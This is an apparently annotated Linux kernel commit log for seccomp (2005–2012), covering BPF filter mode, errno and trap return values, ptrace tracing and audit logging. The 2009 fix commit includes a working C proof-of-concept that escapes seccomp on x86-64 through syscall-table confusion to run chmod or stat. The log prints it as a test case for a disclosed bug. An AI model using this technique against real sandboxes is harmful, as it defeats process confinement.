18 Apr, 2012

1 commit


14 Apr, 2012

5 commits

  • This change adds support for a new ptrace option, PTRACE_O_TRACESECCOMP,
    and a new return value for seccomp BPF programs, SECCOMP_RET_TRACE.

    When a tracer specifies the PTRACE_O_TRACESECCOMP ptrace option, the
    tracer will be notified, via PTRACE_EVENT_SECCOMP, for any syscall that
    results in a BPF program returning SECCOMP_RET_TRACE. The 16-bit
    SECCOMP_RET_DATA mask of the BPF program return value will be passed as
    the ptrace_message and may be retrieved using PTRACE_GETEVENTMSG.

    If the subordinate process is not using a seccomp filter, then no
    system call notifications will occur even if the option is specified.

    If there is no tracer with PTRACE_O_TRACESECCOMP when SECCOMP_RET_TRACE
    is returned, the system call will not be executed and an -ENOSYS errno
    will be returned to userspace.

    This change adds a dependency on the system call slow path. Any future
    efforts to use the system call fast path for seccomp filter will need to
    address this restriction.
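A minimal tracer-side sketch of the mechanism described above. It assumes a libc whose <sys/ptrace.h> exports PTRACE_O_TRACESECCOMP and PTRACE_EVENT_SECCOMP (modern glibc and musl do). The helper names enable_seccomp_tracing, is_seccomp_stop and read_seccomp_trace_data are hypothetical; only the ptrace(2) requests come from the text.

```c
#include <signal.h>
#include <stddef.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Hypothetical helper: ask for PTRACE_EVENT_SECCOMP stops on an already-traced pid. */
long enable_seccomp_tracing(pid_t pid)
{
    return ptrace(PTRACE_SETOPTIONS, pid, NULL, (void *)(long)PTRACE_O_TRACESECCOMP);
}

/* Hypothetical helper: true if a waitpid() status is a PTRACE_EVENT_SECCOMP stop. */
int is_seccomp_stop(int status)
{
    return WIFSTOPPED(status) &&
           (status >> 8) == (SIGTRAP | (PTRACE_EVENT_SECCOMP << 8));
}

/* Hypothetical helper: fetch the SECCOMP_RET_DATA bits passed as the ptrace message. */
long read_seccomp_trace_data(pid_t pid, unsigned long *data)
{
    return ptrace(PTRACE_GETEVENTMSG, pid, NULL, data);
}
```

In a tracer loop, once waitpid() reports a status for which is_seccomp_stop() is true, read_seccomp_trace_data() yields the 16-bit value the filter returned alongside SECCOMP_RET_TRACE, after which the tracer can resume the tracee with PTRACE_CONT.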

    Signed-off-by: Will Drewry
    Acked-by: Eric Paris

    v18: - rebase
    - comment fatal_signal check
    - acked-by
    - drop secure_computing_int comment
    v17: - ...
    v16: - update PT_TRACE_MASK to 0xbf4 so that STOP isn't cleared on SETOPTIONS call (indan@nul.nu)
    [note PT_TRACE_MASK disappears in linux-next]
    v15: - add audit support for non-zero return codes
    - clean up style (indan@nul.nu)
    v14: - rebase/nochanges
    v13: - rebase on to 88ebdda6159ffc15699f204c33feb3e431bf9bdc
    (Brings back a change to ptrace.c and the masks.)
    v12: - rebase to linux-next
    - use ptrace_event and update arch/Kconfig to mention slow-path dependency
    - drop all tracehook changes and inclusion (oleg@redhat.com)
    v11: - invert the logic to just make it a PTRACE_SYSCALL accelerator
    (indan@nul.nu)
    v10: - moved to PTRACE_O_SECCOMP / PT_TRACE_SECCOMP
    v9: - n/a
    v8: - guarded PTRACE_SECCOMP use with an ifdef
    v7: - introduced
    Signed-off-by: James Morris

    Will Drewry
     
  • Adds a new return value to seccomp filters that triggers a SIGSYS to be
    delivered with the new SYS_SECCOMP si_code.

    This allows in-process system call emulation, including just specifying
    an errno or cleanly dumping core, rather than just dying.
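One way a process might observe SECCOMP_RET_TRAP is sketched below. It assumes a Linux libc that supports SA_SIGINFO handlers. The handler only records what it saw and does not emulate the call, because emulation means editing the saved registers in ucontext, which is architecture-specific. The function and variable names are hypothetical. The fallback SYS_SECCOMP value of 1 matches the kernel's si_code for this case. For SECCOMP_RET_TRAP, the kernel places the filter's SECCOMP_RET_DATA bits in si_errno.

```c
#define _GNU_SOURCE
#include <signal.h>
#include <string.h>

/* Fallback for older headers; 1 is the kernel's si_code value for SYS_SECCOMP. */
#ifndef SYS_SECCOMP
#define SYS_SECCOMP 1
#endif

/* Hypothetical bookkeeping written by the handler (async-signal-safe type). */
static volatile sig_atomic_t sigsys_count;
static volatile sig_atomic_t sigsys_from_seccomp;
static volatile sig_atomic_t sigsys_data;

static void on_sigsys(int sig, siginfo_t *info, void *ucontext)
{
    (void)sig;
    (void)ucontext; /* emulation would rewrite saved registers here */
    sigsys_count++;
    sigsys_from_seccomp = (info->si_code == SYS_SECCOMP);
    /* For SECCOMP_RET_TRAP, si_errno carries the filter's SECCOMP_RET_DATA. */
    sigsys_data = info->si_errno;
}

/* Hypothetical helper: route SIGSYS to on_sigsys instead of dumping core. */
int install_sigsys_handler(void)
{
    struct sigaction sa;

    memset(&sa, 0, sizeof sa);
    sa.sa_sigaction = on_sigsys;
    sa.sa_flags = SA_SIGINFO;
    sigemptyset(&sa.sa_mask);
    return sigaction(SIGSYS, &sa, NULL);
}
```

Calling raise(SIGSYS) exercises the handler without any filter installed. In that case si_code is not SYS_SECCOMP, so sigsys_from_seccomp stays 0.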

    Suggested-by: Markus Gutschke
    Suggested-by: Julien Tinnes
    Signed-off-by: Will Drewry
    Acked-by: Eric Paris

    v18: - acked-by, rebase
    - don't mention secure_computing_int() anymore
    v15: - use audit_seccomp/skip
    - pad out error spacing; clean up switch (indan@nul.nu)
    v14: - n/a
    v13: - rebase on to 88ebdda6159ffc15699f204c33feb3e431bf9bdc
    v12: - rebase on to linux-next
    v11: - clarify the comment (indan@nul.nu)
    - s/sigtrap/sigsys
    v10: - use SIGSYS, syscall_get_arch, updates arch/Kconfig
    note suggested-by (though original suggestion had other behaviors)
    v9: - changes to SIGILL
    v8: - clean up based on changes to dependent patches
    v7: - introduction
    Signed-off-by: James Morris

    Will Drewry
     
  • This change adds SECCOMP_RET_ERRNO as a valid return value from a
    seccomp filter. Additionally, it makes the first use of the lower
    16 bits for storing a filter-supplied errno. 16 bits is more than
    enough for the errno values defined in errno-base.h.

    Returning errors instead of immediately terminating processes that
    violate seccomp policy allows for broader use of this functionality
    for kernel attack surface reduction. For example, a Linux container
    could maintain a whitelist of pre-existing system calls but drop
    all new ones with errnos. This would keep a logically static attack
    surface while providing errnos that may allow for graceful failure
    without the downside of do_exit() on a bad call.
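The encoding described above can be sketched with a few helpers. This sketch assumes the UAPI <linux/seccomp.h> constants SECCOMP_RET_ERRNO, SECCOMP_RET_ACTION and SECCOMP_RET_DATA, and the helper names are hypothetical. Because of the 16-bit mask, any value wider than 16 bits is silently truncated.

```c
#include <errno.h>
#include <stdint.h>
#include <linux/seccomp.h>

/* Hypothetical helper: a filter return value that fails the call with err. */
static inline uint32_t seccomp_ret_errno(int err)
{
    return SECCOMP_RET_ERRNO | ((uint32_t)err & SECCOMP_RET_DATA);
}

/* Hypothetical helper: the action half of a filter return value. */
static inline uint32_t seccomp_ret_action(uint32_t ret)
{
    return ret & SECCOMP_RET_ACTION;
}

/* Hypothetical helper: the 16-bit data half (here, the errno). */
static inline uint32_t seccomp_ret_data(uint32_t ret)
{
    return ret & SECCOMP_RET_DATA;
}
```

A filter that returns seccomp_ret_errno(EPERM) for some system call makes that call fail with errno set to EPERM instead of killing the task.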

    This change also changes the signature of __secure_computing. It
    appears the only direct caller is the arm entry code and it clobbers
    any possible return value (register) immediately.

    Signed-off-by: Will Drewry
    Acked-by: Serge Hallyn
    Reviewed-by: Kees Cook
    Acked-by: Eric Paris

    v18: - fix up comments and rebase
    - fix bad var name which was fixed in later revs
    - remove _int() and just change the __secure_computing signature
    v16-v17: ...
    v15: - use audit_seccomp and add a skip label. (eparis@redhat.com)
    - clean up and pad out return codes (indan@nul.nu)
    v14: - no change/rebase
    v13: - rebase on to 88ebdda6159ffc15699f204c33feb3e431bf9bdc
    v12: - move to WARN_ON if filter is NULL
    (oleg@redhat.com, luto@mit.edu, keescook@chromium.org)
    - return immediately for filter==NULL (keescook@chromium.org)
    - change evaluation to only compare the ACTION so that layered
    errnos don't result in the lowest one being returned.
    (keescook@chromium.org)
    v11: - check for NULL filter (keescook@chromium.org)
    v10: - change loaders to fn
    v9: - n/a
    v8: - update Kconfig to note new need for syscall_set_return_value.
    - reordered such that TRAP behavior follows on later.
    - made the for loop a little less indent-y
    v7: - introduced
    Signed-off-by: James Morris

    Will Drewry
     
  • This consolidates the seccomp filter error logging path and adds more
    details to the audit log.

    Signed-off-by: Will Drewry
    Signed-off-by: Kees Cook
    Acked-by: Eric Paris

    v18: make compat= permanent in the record
    v15: added a return code to the audit_seccomp path by wad@chromium.org
    (suggested by eparis@redhat.com)
    v*: original by keescook@chromium.org
    Signed-off-by: James Morris

    Kees Cook
     
  • [This patch depends on luto@mit.edu's no_new_privs patch:
    https://lkml.org/lkml/2012/1/30/264
    The whole series including Andrew's patches can be found here:
    https://github.com/redpig/linux/tree/seccomp
    Complete diff here:
    https://github.com/redpig/linux/compare/1dc65fed...seccomp
    ]

    This patch adds support for seccomp mode 2. Mode 2 introduces the
    ability for unprivileged processes to install system call filtering
    policy expressed in terms of a Berkeley Packet Filter (BPF) program.
    This program will be evaluated in the kernel for each system call
    the task makes and computes a result based on data in the format
    of struct seccomp_data.

    A filter program may be installed by calling:
    struct sock_fprog fprog = { ... };
    ...
    prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &fprog);
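A fuller, self-contained version of the fragment above might look like the sketch below. It relies on several assumptions:

- the UAPI headers <linux/filter.h>, <linux/seccomp.h> and <linux/audit.h> are available;
- only x86-64 and AArch64 are handled;
- getpid is an arbitrary example target, made to fail with EPERM.

The sketch sets no_new_privs first because, per the v6 changelog entry, an unprivileged task needs no_new_privs (or CAP_SYS_ADMIN) before it may install a filter. It also checks seccomp_data.arch, because the same number can name different system calls under different calling conventions (the 2009 x86-64 fix in this log is the classic case). The names sketch_filter, install_sketch_filter and SKETCH_AUDIT_ARCH are hypothetical.

```c
#include <errno.h>
#include <stddef.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

/* Hypothetical: the architecture this sketch expects to run under. */
#if defined(__x86_64__)
#define SKETCH_AUDIT_ARCH AUDIT_ARCH_X86_64
#elif defined(__aarch64__)
#define SKETCH_AUDIT_ARCH AUDIT_ARCH_AARCH64
#else
#error "add the AUDIT_ARCH_* value for this architecture"
#endif

static struct sock_filter sketch_filter[] = {
    /* [0] A = seccomp_data.arch */
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
    /* [1] expected arch: skip to [3]; otherwise fall through to [2] */
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SKETCH_AUDIT_ARCH, 1, 0),
    /* [2] unknown calling convention: kill */
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
    /* [3] A = seccomp_data.nr */
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
    /* [4] getpid: fall through to [5]; anything else: jump to [6] */
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_getpid, 0, 1),
    /* [5] fail getpid with EPERM */
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
    /* [6] allow everything else */
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
};

/* Hypothetical helper: returns 0 on success, -1 with errno set on failure. */
int install_sketch_filter(void)
{
    struct sock_fprog prog = {
        .len = (unsigned short)(sizeof sketch_filter / sizeof sketch_filter[0]),
        .filter = sketch_filter,
    };

    /* Needed unless the caller holds CAP_SYS_ADMIN. */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}
```

After install_sketch_filter() returns 0, syscall(__NR_getpid) should return -1 with errno set to EPERM, while other calls proceed. Any call made under an unexpected architecture value kills the task.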

    The return value of the filter program determines if the system call is
    allowed to proceed or denied. If the first filter program installed
    allows prctl(2) calls, then the above call may be made repeatedly
    by a task to further reduce its access to the kernel. All attached
    programs must be evaluated before a system call will be allowed to
    proceed.
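The rule for stacked filters can be modeled in userspace. This sketch mirrors the rule stated here and in the v12 changelog of the SECCOMP_RET_ERRNO patch above: every filter runs, and the result with the numerically lowest ACTION bits wins, with the DATA bits ignored. The name combine_filter_results is hypothetical. The input array stands in for the per-filter results, with the most recently attached filter first.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <linux/seccomp.h>

/* Hypothetical model of combining results from all attached filters. */
uint32_t combine_filter_results(const uint32_t *rets, size_t n)
{
    uint32_t ret = SECCOMP_RET_ALLOW;
    size_t i;

    /* Fail closed: an empty filter list in filter mode is treated as a bug. */
    if (n == 0)
        return SECCOMP_RET_KILL;

    for (i = 0; i < n; i++) {
        /* Compare only the ACTION bits so the errno value does not affect priority. */
        if ((rets[i] & SECCOMP_RET_ACTION) < (ret & SECCOMP_RET_ACTION))
            ret = rets[i];
    }
    return ret;
}
```

With two ERRNO results, the first one evaluated is kept, because equal ACTIONs do not displace each other. Comparing whole return values instead would let the lower errno win, which is what the v12 change avoided.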

    Filter programs will be inherited across fork/clone and execve.
    However, if the task attaching the filter is unprivileged
    (!CAP_SYS_ADMIN), it must already have the no_new_privs bit set, or
    the filter will not be installed. This ensures that unprivileged tasks
    cannot attach filters that affect privileged tasks (e.g., setuid
    binaries).

    There are a number of benefits to this approach, a few of which are
    as follows:
    - BPF has been exposed to userland for a long time
    - BPF optimization (and JIT'ing) are well understood
    - Userland already knows its ABI: system call numbers and desired
    arguments
    - No time-of-check/time-of-use vulnerable data accesses are possible.
    - system call arguments are loaded on access only to minimize copying
    required for system call policy decisions.
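Filters read struct seccomp_data with 32-bit loads. Checking a 64-bit argument therefore means loading two halves, whose offsets depend on byte order. This sketch assumes the UAPI layout { int nr; __u32 arch; __u64 instruction_pointer; __u64 args[6]; } from <linux/seccomp.h>, with args last as in the v11 reordering. The helpers arg_lo_offset and arg_hi_offset are hypothetical and rely on the GCC/Clang __BYTE_ORDER__ macro.

```c
#include <stddef.h>
#include <stdint.h>
#include <linux/seccomp.h>

/* Hypothetical helper: byte offset of args[i] inside struct seccomp_data. */
static uint32_t arg_offset(unsigned int i)
{
    return (uint32_t)(offsetof(struct seccomp_data, args) + i * sizeof(uint64_t));
}

/* Offset of the low 32 bits of args[i] for the host byte order. */
uint32_t arg_lo_offset(unsigned int i)
{
#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
    return arg_offset(i);
#else
    return arg_offset(i) + (uint32_t)sizeof(uint32_t);
#endif
}

/* Offset of the high 32 bits of args[i] for the host byte order. */
uint32_t arg_hi_offset(unsigned int i)
{
#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
    return arg_offset(i) + (uint32_t)sizeof(uint32_t);
#else
    return arg_offset(i);
#endif
}
```

A filter that tests args[1] against a 64-bit constant would issue a BPF_LD | BPF_W | BPF_ABS load at arg_lo_offset(1), compare, then repeat the load and comparison at arg_hi_offset(1).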

    Mode 2 support is restricted to architectures that enable
    HAVE_ARCH_SECCOMP_FILTER. In this patch, the primary dependency is on
    syscall_get_arguments(). The full desired scope of this feature will
    add a few minor additional requirements expressed later in this series.
    Based on discussion, SECCOMP_RET_ERRNO and SECCOMP_RET_TRACE seem to be
    the desired additional functionality.

    No architectures are enabled in this patch.

    Signed-off-by: Will Drewry
    Acked-by: Serge Hallyn
    Reviewed-by: Indan Zupancic
    Acked-by: Eric Paris
    Reviewed-by: Kees Cook

    v18: - rebase to v3.4-rc2
    - s/chk/check/ (akpm@linux-foundation.org,jmorris@namei.org)
    - allocate with GFP_KERNEL|__GFP_NOWARN (indan@nul.nu)
    - add a comment for get_u32 regarding endianness (akpm@)
    - fix other typos, style mistakes (akpm@)
    - added acked-by
    v17: - properly guard seccomp filter needed headers (leann@ubuntu.com)
    - tighten return mask to 0x7fff0000
    v16: - no change
    v15: - add a 4 instr penalty when counting a path to account for seccomp_filter
    size (indan@nul.nu)
    - drop the max insns to 256KB (indan@nul.nu)
    - return ENOMEM if the max insns limit has been hit (indan@nul.nu)
    - move IP checks after args (indan@nul.nu)
    - drop !user_filter check (indan@nul.nu)
    - only allow explicit bpf codes (indan@nul.nu)
    - exit_code -> exit_sig
    v14: - put/get_seccomp_filter takes struct task_struct
    (indan@nul.nu,keescook@chromium.org)
    - adds seccomp_chk_filter and drops general bpf_run/chk_filter user
    - add seccomp_bpf_load for use by net/core/filter.c
    - lower max per-process/per-hierarchy: 1MB
    - moved nnp/capability check prior to allocation
    (all of the above: indan@nul.nu)
    v13: - rebase on to 88ebdda6159ffc15699f204c33feb3e431bf9bdc
    v12: - added a maximum instruction count per path (indan@nul.nu,oleg@redhat.com)
    - removed copy_seccomp (keescook@chromium.org,indan@nul.nu)
    - reworded the prctl_set_seccomp comment (indan@nul.nu)
    v11: - reorder struct seccomp_data to allow future args expansion (hpa@zytor.com)
    - style clean up, @compat dropped, compat_sock_fprog32 (indan@nul.nu)
    - do_exit(SIGSYS) (keescook@chromium.org, luto@mit.edu)
    - pare down Kconfig doc reference.
    - extra comment clean up
    v10: - seccomp_data has changed again to be more aesthetically pleasing
    (hpa@zytor.com)
    - calling convention is noted in a new u32 field using syscall_get_arch.
    This allows for cross-calling convention tasks to use seccomp filters.
    (hpa@zytor.com)
    - lots of clean up (thanks, Indan!)
    v9: - n/a
    v8: - use bpf_chk_filter, bpf_run_filter. update load_fns
    - Lots of fixes courtesy of indan@nul.nu:
    -- fix up load behavior, compat fixups, and merge alloc code,
    -- renamed pc and dropped __packed, use bool compat.
    -- Added a hidden CONFIG_SECCOMP_FILTER to synthesize non-arch
    dependencies
    v7: (massive overhaul thanks to Indan, others)
    - added CONFIG_HAVE_ARCH_SECCOMP_FILTER
    - merged into seccomp.c
    - minimal seccomp_filter.h
    - no config option (part of seccomp)
    - no new prctl
    - doesn't break seccomp on systems without asm/syscall.h
    (works but arg access always fails)
    - dropped seccomp_init_task, extra free functions, ...
    - dropped the no-asm/syscall.h code paths
    - merges with network sk_run_filter and sk_chk_filter
    v6: - fix memory leak on attach compat check failure
    - require no_new_privs || CAP_SYS_ADMIN prior to filter
    installation. (luto@mit.edu)
    - s/seccomp_struct_/seccomp_/ for macros/functions (amwang@redhat.com)
    - cleaned up Kconfig (amwang@redhat.com)
    - on block, note if the call was compat (so the # means something)
    v5: - uses syscall_get_arguments
    (indan@nul.nu,oleg@redhat.com, mcgrathr@chromium.org)
    - uses union-based arg storage with hi/lo struct to
    handle endianness. Compromises between the two alternate
    proposals to minimize extra arg shuffling and account for
    endianness assuming userspace uses offsetof().
    (mcgrathr@chromium.org, indan@nul.nu)
    - update Kconfig description
    - add include/seccomp_filter.h and add its installation
    - (naive) on-demand syscall argument loading
    - drop seccomp_t (eparis@redhat.com)
    v4: - adjusted prctl to make room for PR_[SG]ET_NO_NEW_PRIVS
    - now uses current->no_new_privs
    (luto@mit.edu,torvalds@linux-foundation.org)
    - assign names to seccomp modes (rdunlap@xenotime.net)
    - fix style issues (rdunlap@xenotime.net)
    - reworded Kconfig entry (rdunlap@xenotime.net)
    v3: - macros to inline (oleg@redhat.com)
    - init_task behavior fixed (oleg@redhat.com)
    - drop creator entry and extra NULL check (oleg@redhat.com)
    - alloc returns -EINVAL on bad sizing (serge.hallyn@canonical.com)
    - adds tentative use of "always_unprivileged" as per
    torvalds@linux-foundation.org and luto@mit.edu
    v2: - (patch 2 only)
    Signed-off-by: James Morris

    Will Drewry
     

18 Jan, 2012

1 commit

  • The audit system likes to collect information about processes that end
    abnormally (SIGSEGV) as this may be useful intrusion detection information.
    This patch adds audit support to collect information when seccomp forces a
    task to exit because of misbehavior in a similar way.

    Signed-off-by: Eric Paris

    Eric Paris
     

03 Mar, 2009

1 commit

  • On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
    ljmp, and then use the "syscall" instruction to make a 64-bit system
    call. A 64-bit process can make a 32-bit system call with int $0x80.

    In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
    the wrong system call number table. The fix is simple: test TS_COMPAT
    instead of TIF_IA32. Here is an example exploit:

    /* test case for seccomp circumvention on x86-64

    There are two failure modes: compile with -m64 or compile with -m32.

    The -m64 case is the worst one, because it does "chmod 777 ." (could
    be any chmod call). The -m32 case demonstrates it was able to do
    stat(), which can glean information but not harm anything directly.

    A buggy kernel will let the test do something, print, and exit 1; a
    fixed kernel will make it exit with SIGKILL before it does anything.
    */

    #define _GNU_SOURCE
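    #include <assert.h>
    #include <inttypes.h>
    #include <stdio.h>
    #include <sys/prctl.h>
    #include <sys/stat.h>
    #include <unistd.h>
    #include <asm/unistd.h>

    int
    main (int argc, char **argv)
    {
      char buf[100];
      static const char dot[] = ".";
      long ret;
      unsigned st[36];  /* 144 bytes: room for a full x86-64 struct stat */

      if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
        perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

    #ifdef __x86_64__
      /* 64-bit process: i386 call 15 (chmod) via int $0x80, which the
         buggy check reads as x86-64 call 15 (rt_sigreturn). */
      assert ((uintptr_t) dot < (1UL << 32));
      asm ("int $0x80 # %0 <- %1(%2 %3)"
           : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      ret = snprintf (buf, sizeof buf,
                      "result %ld (check mode on .!)\n", ret);
    #elif defined __i386__
      /* 32-bit process: far-jump to 64-bit mode and issue x86-64 call 4
         (stat), which the buggy check reads as i386 call 4 (write). */
      asm (".code32\n"
           "pushl %%cs\n"
           "pushl $2f\n"
           "ljmpl $0x33, $1f\n"
           ".code64\n"
           "1: syscall # %0 <- %1(%2 %3)\n"
           "lcall *(%%rsp)\n"
           ".code32\n"
           "2:"
           : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      if (ret == 0)
        ret = snprintf (buf, sizeof buf,
                        "stat . -> st_uid=%u\n", st[7]);
      else
        ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
    #else
    # error "not this one"
    #endif

      write (1, buf, ret);

      syscall (__NR_exit, 1);
      return 2;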
    }
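The exploit works because mode 1 checks the number against one syscall table while the kernel dispatches it through the other. The toy model below illustrates this. Its numbers are hard-coded from the i386 and x86-64 tables, an assumption of the sketch rather than values taken from kernel headers, and mode1_allows is a hypothetical name.

```c
#include <stddef.h>

/* Mode 1 allows only read, write, exit and (rt_)sigreturn. */
static const int mode1_i386[] = { 3 /* read */, 4 /* write */, 1 /* exit */, 119 /* sigreturn */ };
static const int mode1_x86_64[] = { 0 /* read */, 1 /* write */, 60 /* exit */, 15 /* rt_sigreturn */ };

/* Hypothetical helper: 1 if nr is on the mode-1 allowlist of the chosen table. */
int mode1_allows(int nr, int use_i386_table)
{
    const int *list = use_i386_table ? mode1_i386 : mode1_x86_64;
    size_t count = sizeof mode1_i386 / sizeof mode1_i386[0]; /* both lists have 4 entries */
    size_t i;

    for (i = 0; i < count; i++)
        if (list[i] == nr)
            return 1;
    return 0;
}
```

In the -m64 case, mode1_allows(15, 0) returns 1 because 15 is rt_sigreturn on x86-64, yet int $0x80 makes the kernel run i386 call 15, chmod. Testing TS_COMPAT selects the i386 table instead, where 15 is rejected.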

    Signed-off-by: Roland McGrath
    [ I don't know if anybody actually uses seccomp, but it's enabled in
    at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
    Signed-off-by: Linus Torvalds

    Roland McGrath
     

17 Jul, 2007

2 commits

  • This follows a suggestion from Chuck Ebbert on how to make seccomp
    absolutely zero-cost in schedule too. The only remaining footprint of
    seccomp is the bzImage size, which becomes a few bytes (perhaps even a
    few kbytes) larger; measure it if you care about embedded systems.

    Signed-off-by: Andrea Arcangeli
    Cc: Andi Kleen
    Signed-off-by: Andrew Morton
    Signed-off-by: Linus Torvalds

    Andrea Arcangeli
     
  • This reduces the memory footprint and it enforces that only the current
    task can enable seccomp on itself (this is a requirement for a
    straightforward [modulo preempt ;) ] TIF_NOTSC implementation).

    Signed-off-by: Andrea Arcangeli
    Signed-off-by: Andrew Morton
    Signed-off-by: Linus Torvalds

    Andrea Arcangeli
     

17 Apr, 2005

1 commit

  • Initial git repository build. I'm not bothering with the full history,
    even though we have it. We can create a separate "historical" git
    archive of that later if we want to, and in the meantime it's about
    3.2GB when imported into git - space that would just make the early
    git days unnecessarily complicated, when we don't have a lot of good
    infrastructure for it.

    Let it rip!

    Linus Torvalds